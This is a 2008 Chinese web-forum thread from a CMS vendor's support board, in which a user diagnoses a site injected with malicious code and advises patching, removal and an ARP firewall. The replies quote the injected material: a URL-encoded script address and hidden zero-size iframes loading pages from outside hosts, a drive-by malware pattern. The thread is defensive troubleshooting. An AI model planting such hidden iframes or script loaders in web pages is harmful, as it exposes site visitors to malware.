账号通
    

账号  

密码  

2511

查看

10

回复
主题:紧急求助:又被嵌入代码了 [收藏主题] 转到:  
bingguo 当前离线

218

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:2263 分
登录次数:153 次
注册时间:2007/8/10
最后登录:2010/9/14
bingguo 发表于:2008/5/18 10:07:00   | 显示全部帖子 查看该作者主题 楼主 
科汛在线网校系统

额..是么?

帮你深入看了下```

http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73

这段代码 刚刚通过URL***得到

a.8e9.net\/1.js 这个JS地址

 

继续打开这个JS

发现:

iframe src=http:\/\/www.kiki01.net\/7.htm?ffff width=100 height=0><\/iframe>

以及<iframe src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/cnzz.htm width=0 height=0><\/iframe>");

 

你网页iframe的两个页面``而且因为 高度 或者宽度 为0 ...很难发现

如果再继续 打开这两个IFRAME的页面....我猜里面可能又会涉及到其他一些页面``

 

想跟你说的是``这个很符合ARP欺骗的象征`应该是说不排除被ARP攻击的原因`最好首先是检查下服务器漏洞...该打的补丁打上.找到恶意代码.删掉.立即打上ARP防火墙``..设置下文件权限``

如果这个还不行的话``.那我就真的无法相信 科讯系统 居然有那么大的注入漏洞?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bingguo 当前离线

218

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:2263 分
登录次数:153 次
注册时间:2007/8/10
最后登录:2010/9/14
bingguo 发表于:2008/5/18 9:24:00   | 显示全部帖子 查看该作者主题 沙发 
科汛在线考试系统(NET)

这个跟科讯 没关系..

是你服务器的问题```

要么是你服务器中毒了``要么就是遭受其他机器攻击``

把代码删掉``然后赶紧找个360的ARP防火墙装上``

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.17383秒 powered by KesionCMS 9.0